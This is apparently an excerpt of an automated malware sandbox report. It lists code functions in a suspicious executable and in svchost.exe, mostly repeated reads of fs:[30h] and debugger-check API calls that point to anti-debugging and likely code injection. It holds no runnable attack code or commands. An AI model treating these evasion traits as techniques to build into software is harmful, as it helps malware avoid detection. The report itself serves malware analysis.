            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe Code function: 4_2_00E13B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 4_2_00E13B4C
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe Code function: 4_2_00E45CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 4_2_00E45CCC
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe Code function: 4_2_00E8C304 LoadLibraryA,GetProcAddress, 4_2_00E8C304
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe Code function: 4_2_00D434D0 mov eax, dword ptr fs:[00000030h] 4_2_00D434D0
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe Code function: 4_2_00D43470 mov eax, dword ptr fs:[00000030h] 4_2_00D43470
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe Code function: 4_2_00D41E70 mov eax, dword ptr fs:[00000030h] 4_2_00D41E70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h] 6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034B035C mov eax, dword ptr fs:[00000030h] 6_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034B035C mov ecx, dword ptr fs:[00000030h] 6_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034FA352 mov eax, dword ptr fs:[00000030h] 6_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034D8350 mov ecx, dword ptr fs:[00000030h] 6_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0350634F mov eax, dword ptr fs:[00000030h] 6_2_0350634F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034D437C mov eax, dword ptr fs:[00000030h] 6_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0346A30B mov eax, dword ptr fs:[00000030h] 6_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0342C310 mov ecx, dword ptr fs:[00000030h] 6_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03450310 mov ecx, dword ptr fs:[00000030h] 6_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03508324 mov eax, dword ptr fs:[00000030h] 6_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03508324 mov ecx, dword ptr fs:[00000030h] 6_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034EC3CD mov eax, dword ptr fs:[00000030h] 6_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 6_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034383C0 mov eax, dword ptr fs:[00000030h] 6_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034B63C0 mov eax, dword ptr fs:[00000030h] 6_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034DE3DB mov eax, dword ptr fs:[00000030h] 6_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034DE3DB mov ecx, dword ptr fs:[00000030h] 6_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034D43D4 mov eax, dword ptr fs:[00000030h] 6_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h] 6_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0344E3F0 mov eax, dword ptr fs:[00000030h] 6_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034663FF mov eax, dword ptr fs:[00000030h] 6_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0342E388 mov eax, dword ptr fs:[00000030h] 6_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0345438F mov eax, dword ptr fs:[00000030h] 6_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03428397 mov eax, dword ptr fs:[00000030h] 6_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034B8243 mov eax, dword ptr fs:[00000030h] 6_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034B8243 mov ecx, dword ptr fs:[00000030h] 6_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0350625D mov eax, dword ptr fs:[00000030h] 6_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0342A250 mov eax, dword ptr fs:[00000030h] 6_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03436259 mov eax, dword ptr fs:[00000030h] 6_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034EA250 mov eax, dword ptr fs:[00000030h] 6_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03434260 mov eax, dword ptr fs:[00000030h] 6_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0342826B mov eax, dword ptr fs:[00000030h] 6_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h] 6_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0342823B mov eax, dword ptr fs:[00000030h] 6_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0343A2C3 mov eax, dword ptr fs:[00000030h] 6_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_035062D6 mov eax, dword ptr fs:[00000030h] 6_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034402E1 mov eax, dword ptr fs:[00000030h] 6_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0346E284 mov eax, dword ptr fs:[00000030h] 6_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034B0283 mov eax, dword ptr fs:[00000030h] 6_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034402A0 mov eax, dword ptr fs:[00000030h] 6_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034C62A0 mov eax, dword ptr fs:[00000030h] 6_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034C62A0 mov ecx, dword ptr fs:[00000030h] 6_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034C4144 mov eax, dword ptr fs:[00000030h] 6_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034C4144 mov ecx, dword ptr fs:[00000030h] 6_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0342C156 mov eax, dword ptr fs:[00000030h] 6_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034C8158 mov eax, dword ptr fs:[00000030h] 6_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03436154 mov eax, dword ptr fs:[00000030h] 6_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03504164 mov eax, dword ptr fs:[00000030h] 6_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034DE10E mov eax, dword ptr fs:[00000030h] 6_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034DE10E mov ecx, dword ptr fs:[00000030h] 6_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034DA118 mov ecx, dword ptr fs:[00000030h] 6_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034DA118 mov eax, dword ptr fs:[00000030h] 6_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034F0115 mov eax, dword ptr fs:[00000030h] 6_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03460124 mov eax, dword ptr fs:[00000030h] 6_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034F61C3 mov eax, dword ptr fs:[00000030h] 6_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034AE1D0 mov eax, dword ptr fs:[00000030h] 6_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034AE1D0 mov ecx, dword ptr fs:[00000030h] 6_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_035061E5 mov eax, dword ptr fs:[00000030h] 6_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034601F8 mov eax, dword ptr fs:[00000030h] 6_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03470185 mov eax, dword ptr fs:[00000030h] 6_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034EC188 mov eax, dword ptr fs:[00000030h] 6_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034D4180 mov eax, dword ptr fs:[00000030h] 6_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034B019F mov eax, dword ptr fs:[00000030h] 6_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0342A197 mov eax, dword ptr fs:[00000030h] 6_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03432050 mov eax, dword ptr fs:[00000030h] 6_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034B6050 mov eax, dword ptr fs:[00000030h] 6_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0345C073 mov eax, dword ptr fs:[00000030h] 6_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034B4000 mov ecx, dword ptr fs:[00000030h] 6_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h] 6_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0344E016 mov eax, dword ptr fs:[00000030h] 6_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0342A020 mov eax, dword ptr fs:[00000030h] 6_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0342C020 mov eax, dword ptr fs:[00000030h] 6_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034C6030 mov eax, dword ptr fs:[00000030h] 6_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034B20DE mov eax, dword ptr fs:[00000030h] 6_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0342A0E3 mov ecx, dword ptr fs:[00000030h] 6_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034380E9 mov eax, dword ptr fs:[00000030h] 6_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034B60E0 mov eax, dword ptr fs:[00000030h] 6_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0342C0F0 mov eax, dword ptr fs:[00000030h] 6_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034720F0 mov ecx, dword ptr fs:[00000030h] 6_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0343208A mov eax, dword ptr fs:[00000030h] 6_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034280A0 mov eax, dword ptr fs:[00000030h] 6_2_034280A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034C80A8 mov eax, dword ptr fs:[00000030h] 6_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034F60B8 mov eax, dword ptr fs:[00000030h] 6_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034F60B8 mov ecx, dword ptr fs:[00000030h] 6_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0346674D mov esi, dword ptr fs:[00000030h] 6_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0346674D mov eax, dword ptr fs:[00000030h] 6_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03430750 mov eax, dword ptr fs:[00000030h] 6_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034BE75D mov eax, dword ptr fs:[00000030h] 6_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03472750 mov eax, dword ptr fs:[00000030h] 6_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034B4755 mov eax, dword ptr fs:[00000030h] 6_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03438770 mov eax, dword ptr fs:[00000030h] 6_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03440770 mov eax, dword ptr fs:[00000030h] 6_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0346C700 mov eax, dword ptr fs:[00000030h] 6_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03430710 mov eax, dword ptr fs:[00000030h] 6_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03460710 mov eax, dword ptr fs:[00000030h] 6_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0346C720 mov eax, dword ptr fs:[00000030h] 6_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0346273C mov eax, dword ptr fs:[00000030h] 6_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0346273C mov ecx, dword ptr fs:[00000030h] 6_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034AC730 mov eax, dword ptr fs:[00000030h] 6_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0343C7C0 mov eax, dword ptr fs:[00000030h] 6_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034B07C3 mov eax, dword ptr fs:[00000030h] 6_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034527ED mov eax, dword ptr fs:[00000030h] 6_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034BE7E1 mov eax, dword ptr fs:[00000030h] 6_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034347FB mov eax, dword ptr fs:[00000030h] 6_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034D678E mov eax, dword ptr fs:[00000030h] 6_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034307AF mov eax, dword ptr fs:[00000030h] 6_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034E47A0 mov eax, dword ptr fs:[00000030h] 6_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0344C640 mov eax, dword ptr fs:[00000030h] 6_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034F866E mov eax, dword ptr fs:[00000030h] 6_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0346A660 mov eax, dword ptr fs:[00000030h] 6_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03462674 mov eax, dword ptr fs:[00000030h] 6_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_034AE609 mov eax, dword ptr fs:[00000030h] 6_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0344260B mov eax, dword ptr fs:[00000030h] 6_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344260B mov eax, dword ptr fs:[00000030h]6_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472619 mov eax, dword ptr fs:[00000030h]6_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344E627 mov eax, dword ptr fs:[00000030h]6_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03466620 mov eax, dword ptr fs:[00000030h]6_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03468620 mov eax, dword ptr fs:[00000030h]6_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343262C mov eax, dword ptr fs:[00000030h]6_2_0343262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]6_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346A6C7 mov eax, dword ptr fs:[00000030h]6_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE6F2 mov eax, dword ptr fs:[00000030h]6_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE6F2 mov eax, dword ptr fs:[00000030h]6_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE6F2 mov eax, dword ptr fs:[00000030h]6_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE6F2 mov eax, dword ptr fs:[00000030h]6_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B06F1 mov eax, dword ptr fs:[00000030h]6_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B06F1 mov eax, dword ptr fs:[00000030h]6_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03434690 mov eax, dword ptr fs:[00000030h]6_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03434690 mov eax, dword ptr fs:[00000030h]6_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346C6A6 mov eax, dword ptr fs:[00000030h]6_2_0346C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034666B0 mov eax, dword ptr fs:[00000030h]6_2_034666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03438550 mov eax, dword ptr fs:[00000030h]6_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03438550 mov eax, dword ptr fs:[00000030h]6_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346656A mov eax, dword ptr fs:[00000030h]6_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346656A mov eax, dword ptr fs:[00000030h]6_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346656A mov eax, dword ptr fs:[00000030h]6_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C6500 mov eax, dword ptr fs:[00000030h]6_2_034C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]6_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]6_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]6_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]6_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]6_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]6_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]6_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]6_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]6_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]6_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]6_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]6_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]6_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E53E mov eax, dword ptr fs:[00000030h]6_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E53E mov eax, dword ptr fs:[00000030h]6_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E53E mov eax, dword ptr fs:[00000030h]6_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E53E mov eax, dword ptr fs:[00000030h]6_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E53E mov eax, dword ptr fs:[00000030h]6_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E5CF mov eax, dword ptr fs:[00000030h]6_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E5CF mov eax, dword ptr fs:[00000030h]6_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034365D0 mov eax, dword ptr fs:[00000030h]6_2_034365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346A5D0 mov eax, dword ptr fs:[00000030h]6_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346A5D0 mov eax, dword ptr fs:[00000030h]6_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034325E0 mov eax, dword ptr fs:[00000030h]6_2_034325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346C5ED mov eax, dword ptr fs:[00000030h]6_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346C5ED mov eax, dword ptr fs:[00000030h]6_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03432582 mov eax, dword ptr fs:[00000030h]6_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03432582 mov ecx, dword ptr fs:[00000030h]6_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03464588 mov eax, dword ptr fs:[00000030h]6_2_03464588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E59C mov eax, dword ptr fs:[00000030h]6_2_0346E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B05A7 mov eax, dword ptr fs:[00000030h]6_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B05A7 mov eax, dword ptr fs:[00000030h]6_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B05A7 mov eax, dword ptr fs:[00000030h]6_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034545B1 mov eax, dword ptr fs:[00000030h]6_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034545B1 mov eax, dword ptr fs:[00000030h]6_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034EA456 mov eax, dword ptr fs:[00000030h]6_2_034EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342645D mov eax, dword ptr fs:[00000030h]6_2_0342645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345245A mov eax, dword ptr fs:[00000030h]6_2_0345245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BC460 mov ecx, dword ptr fs:[00000030h]6_2_034BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345A470 mov eax, dword ptr fs:[00000030h]6_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345A470 mov eax, dword ptr fs:[00000030h]6_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345A470 mov eax, dword ptr fs:[00000030h]6_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03468402 mov eax, dword ptr fs:[00000030h]6_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03468402 mov eax, dword ptr fs:[00000030h]6_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03468402 mov eax, dword ptr fs:[00000030h]6_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342E420 mov eax, dword ptr fs:[00000030h]6_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342E420 mov eax, dword ptr fs:[00000030h]6_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342E420 mov eax, dword ptr fs:[00000030h]6_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342C427 mov eax, dword ptr fs:[00000030h]6_2_0342C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]6_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]6_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]6_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]6_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]6_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]6_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]6_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346A430 mov eax, dword ptr fs:[00000030h]6_2_0346A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034304E5 mov ecx, dword ptr fs:[00000030h]6_2_034304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034EA49A mov eax, dword ptr fs:[00000030h]6_2_034EA49A
